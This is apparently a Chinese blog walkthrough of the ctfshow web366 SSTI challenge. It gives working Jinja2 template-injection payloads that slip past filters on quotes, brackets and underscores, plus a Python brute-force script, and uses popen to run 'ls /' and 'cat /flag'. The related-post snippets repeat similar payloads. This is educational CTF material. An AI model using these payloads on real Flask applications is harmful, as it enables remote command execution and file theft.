SSTI模板注入-中括号、args、下划线、单双引号被过滤绕过(ctfshow web入门366)

最新推荐文章于 2024-11-13 17:21:26 发布
最新推荐文章于 2024-11-13 17:21:26 发布
阅读量1k 收藏 1
点赞数
分类专栏: CTFShow SSTI模板注入 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52635170/article/details/129829225
版权
文章详细介绍了如何在SSTI(Server-SideTemplateInjection)漏洞中,通过小括号、attr方法、request.values参数等手段,绕过对单双引号、中括号、下划线的过滤,来获取类、基类、子类以及执行shell命令的方法,最终实现执行shell命令获取flag的目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SSTI模板注入-中括号、args、下划线、单双引号被过滤绕过(ctfshow web入门366)

绕过原理

单双引号被过滤,意味着我们不能通过单双引号来获取基类和子类,也不能以字符串的方式传递我们执行的命令,这样的话我们可以使用小括号来获取基类和子类,使用request.values.参数 和 reqest.args.参数 通过传参的方式来传递执行的命令,如果args被过滤就是用request.values.参数 的方式。中括号被过滤,意味着我们不能通过子类的索引值来获取我们想要的子类以及不能通过方法名来获取我们想要的方法,这时我们可以通过使用__getitem__()方法来获取,该方法即可传递数值也可传递字符串。

下划线被过滤,这就意味着我们不能使用__class__、__base__、__globals__等等带有下划线的方法,这时我们可以使用attr(request.values.参数)的方法来获取,例如:().__class__ 与 ()|attr(“__class__”)是一样的效果,由于下划线被过滤,我们通过传参的方式来解决,即:()|attr(request.values.a)&a=__class__。

实例引入-ctfshow web入门366

1、判断是否存在SSTI模板注入漏洞

输出参数?name={{7*7}} 看页面是否回显出49,如果回显49即存在SSTI模板注入漏洞。
在这里插入图片描述
页面回显49,证明该站点存在SSTI模板注入漏洞。

2、获得内置类所对应的类

由于单双引号与中括号、args还有下线被过滤,我们使用小括号来获取类,使用|attr()来获取类名,使用request.values.参数 来传参。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)}}&a=__class__

在这里插入图片描述

3、获得object基类

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)}}&a=__class__&b=__base__

在这里插入图片描述

4、获得所有子类

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()}}&a=__class__&b=__base__&c=__subclasses__

在这里插入图片描述

5、获得含有可以执行shell命令方法的类

我们还是以获取包含popen()方法的类,即:os._wrap_close。
但是由于我们事先不知道该类含有popen()方法,所以我们还是写一个python脚本跑一下,使用requests模块循环请求页面,每次请求改变子类的索引值,并判断返回的源码中是否含有"popen",如果有直接中断循环,记录该索引值,该索引值所对应的类即是我们需要的类。

import requests

for num in range(500):
    url = "http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(" + str(num) + ")|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen"
    res = requests.get(url).text
    if "popen" in res:
        print(num)
        break

在这里插入图片描述
得到我们需要子类的索引值为132。

6、获得可以执行shell命令的方法

由于我们上步骤是以popen()方法为例的吗,那么我们获取的执行shell命令的方法也就是popen()方法。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen

在这里插入图片描述

7、执行shell命令获取flag

由于popen()返回的file对象,所以我们要得到shell执行的结果,我们还需要使用read()来读取才能获取shell执行的结果。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen&h=ls /

在这里插入图片描述
发现根目录下存在flag,直接cat读取。

http://499539f4-6b83-4186-b30f-6957b5cb2fea.challenge.ctf.show/?name={{(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen&h=cat /flag

在这里插入图片描述
成功拿到flag。

网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 1万+
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
网络安全最全ctfshow web入门 SSTI(1)
2401_84301853的博客
05-04 677
使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。8.调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。payload。
ctfshow-SSTI
ing_end的博客
05-07 921
SSTI web361 payload: ?name={{ config.__class__.__init__.__globals__['os'].popen('ls').read() }} ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} 之后打开 ?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag
ctfshow-web365(SSTI)
m0_62094846的博客
05-05 575
这次是把args [ 和' 过滤了 有两种方式可以绕过[ 可以用__getitem__和pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__ ?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class__.__base__.__subclasses__()[132].__init__.__globals__
SSTI模板注入-中括号args双引号过滤绕过ctfshow web入门365)
你们de4月天的博客
03-28 2141
SSTI模板注入漏洞——中括号双引号args过滤ctfshow web入门365
SSTI模板注入-中括号args下划线双引号、os、request、花括号、数字被过滤绕过ctfshow web入门370)
你们de4月天的博客
03-30 1861
ctfshow web入门370 中括号argsrequest下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
SSTI模板注入-args双引号过滤绕过ctfshow web入门364)
你们de4月天的博客
03-18 387
双引号过滤时,我们使用()或者[]来获得我们所需要的类,并且我们是尝试使用传参的方式将我们的shell命令传进去执行,但是当args也被过滤的时候,我们就不能使用request.args.参数名 来进行传参了。我这里的绕过方法有两种,一种是我们获得chr()这个python的内置函数,chr(ascii值)函数接收一个字符的ascii码值然后将该ascii码值所对应的字符返回,这时我们就可以使用chr(ascii值)得到我们想要的字符,然后将其进行拼接成我们想要的字符串或者shell命令。
SSTI模板注入-中括号args下划线双引号、os、request、花括号被过滤绕过ctfshow web入门369)
你们de4月天的博客
03-30 3313
ctfshow web入门369 中括号argsrequest、花括号、引号、中括号、os被过滤绕过 SSTI模板注入漏洞过滤绕过
SSTI模板注入-中括号args下划线双引号、双大括号被过滤绕过ctfshow web入门368)
你们de4月天的博客
03-29 1350
SSTI模板注入漏洞 中括号args下划线双引号、双大括号被过滤 ctfshow web入门368
ctfshow web入门 ssti过滤引号+args
c1516175954的博客
09-21 156
在上一关的payload的基础上(即数组形式+args),将args替换为valuesargs引号被过滤
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 2051
1、过滤中括号 2、过滤了双下划线 3、过滤下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
ctfshow-web366,367(SSTI)
m0_62094846的博客
05-05 355
_ args [ ' 都被过滤了 有绕过_的方法,但是因为过滤了[,也过滤args,所以没法用 用attr的话还是会有_,还要加一个和request.args作用相似的东西,request.cookies
SSTI模板注入-双引号过滤绕过ctfshow web入门363)
你们de4月天的博客
03-18 667
我们获取基类以及所有子类的时候,可以使用()或者[]来获取。当我们使用可以执行shell命令的方法时,必定要使用引号或者双引号来包裹我们执行的命令,这时我们可以使用request.args.参数名或者request.values.参数名等传参方式将我们的命令等需要引号包裹的字符串进行传参即可。
ctfshow-web入门-SSTIweb361-web368)上
Welcome To Myon'Blog !
11-13 888
这个 payload 是一次性的,因为 pop 会删除里面的键,导致环境崩溃。对于这种没有过滤的,还有其他很多很多方法,这里就不列举了。前面的 payload 太长了,构造起来比较麻烦和乱。更保险的是使用 __getitem__ ,方法同上。(1)使用子类可以直接调用的函数来打。模糊测试看一下,过滤了 2 和 3。双大括号中过滤request。测试一下存在 SSTI 注入。并且 post 传参不允许。那就传给 cookie 吧。但是 {% %} 中可用。一起传给 cookie。
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 3824
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3408
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
ctfshow web入门-SSTI
LYJ20010728的博客
09-09 1558
ctfshow web入门-SSTIweb361题目描述解题思路web362题目描述解题思路web363题目描述解题思路web364题目描述解题思路web365题目描述解题思路web366题目描述解题思路web367题目描述解题思路web368题目描述解题思路web369题目描述解题思路web370题目描述解题思路web371题目描述解题思路web372题目描述解题思路trick web361 题目描述 名字就是考点 解题思路 直接读取 FLAG 即可,这里利用的是 os._wrap_close
SSTI服务器模板注入原理&攻击手法&绕过手法&防御手段
qq_56815564的博客
07-31 1532
时间一晃,又是好久没有发过文章了,最近再准备面试了,当你真正去准备的时候你才会发现自己原来什么都还只是个半吊子,哎难顶正好看到一道面试题,说是说一下python有关的漏洞,这边因为对php的漏洞熟悉一点,所以这方面我发现我是真的什么都不知道,于是上网去找了很久,再学习的过程中顺便总结了这篇文章吧🙏。
有关于服务端模板注入ssti攻击)——BUUCTF - easy_tornado
ancan8807的博客
09-07 1160
打开题目出现3个链接 /flag.txt 中提示flag in /fllllllllllllag /welcome.txt 中提示 render /hints.txt 中提示 md5(cookie_secret+md5(filename)) 直接访问/fllllllllllllag失败。 百度了render可知,render是python的一个模板,他们的url都是...
ctfshow web入门ssti
最新发布
01-25
### CTFShow Web 入门 SSTI 教程 #### 题目描述 在一个基于 PHP 的 Web 应用中,存在一个可以接受用户输入并渲染到网页上的功能。该功能使用了模板引擎来处理用户的输入数据。 #### 解题思路 在服务器端模板注入 (Server-Side Template Injection, SSTI) 攻击中,攻击者利用应用程序中的漏洞向模板引擎传递恶意代码,从而实现远程命令执行或其他危害行为。对于本道题目而言: - **确认使用的模板引擎** 如果应用采用的是 Twig 或其他支持复杂表达式的模板库,则可能存在 SSTI 漏洞的风险[^2]。 - **测试是否存在 SSTI 漏洞** 可以尝试提交一些特殊的字符串作为输入,观察其输出结果是否有异常变化。例如,发送 `{{7*7}}` 并期望看到计算的结果而不是原始字符本身被显示出来。 - **探索可利用的功能** 当发现确实能够影响模板解析过程之后,下一步就是要找出如何进一步控制这些操作。这可能涉及到调用内置函数、读取文件内容甚至是执行系统指令等动作。 针对此案例的具体解法如下所示: 假设目标站点有一个 URL 参数名为 `name` ,用于接收用户名字并在页面上展示欢迎信息。此时可以通过构造特定形式的数据包来进行试探性的攻击尝试: ```http GET /index.php?name={{7*'a'}} HTTP/1.1 Host: example.com ``` 如果返回的内容包含了七个连续的小写字母 'aaaaaaa' 而不是原样呈现 {{7*'a'}}, 则说明很可能存在 SSTI 缺陷。 为了验证这一点以及获取更多权限,还可以继续深入挖掘可用的方法。比如查看当前工作目录下的所有文件列表: ```http GET /index.php?name={{self._env.__init__.__globals__['os'].getcwd()}} HTTP/1.1 Host: example.com ``` 一旦成功触发上述语句并将路径反馈至前端界面,就意味着已经掌握了对服务器内部结构的部分了解,进而为进一步渗透提供了条件。 当然,在实际环境中应当遵循合法合规的原则开展安全研究活动,严禁非法入侵他人信息系统的行为发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值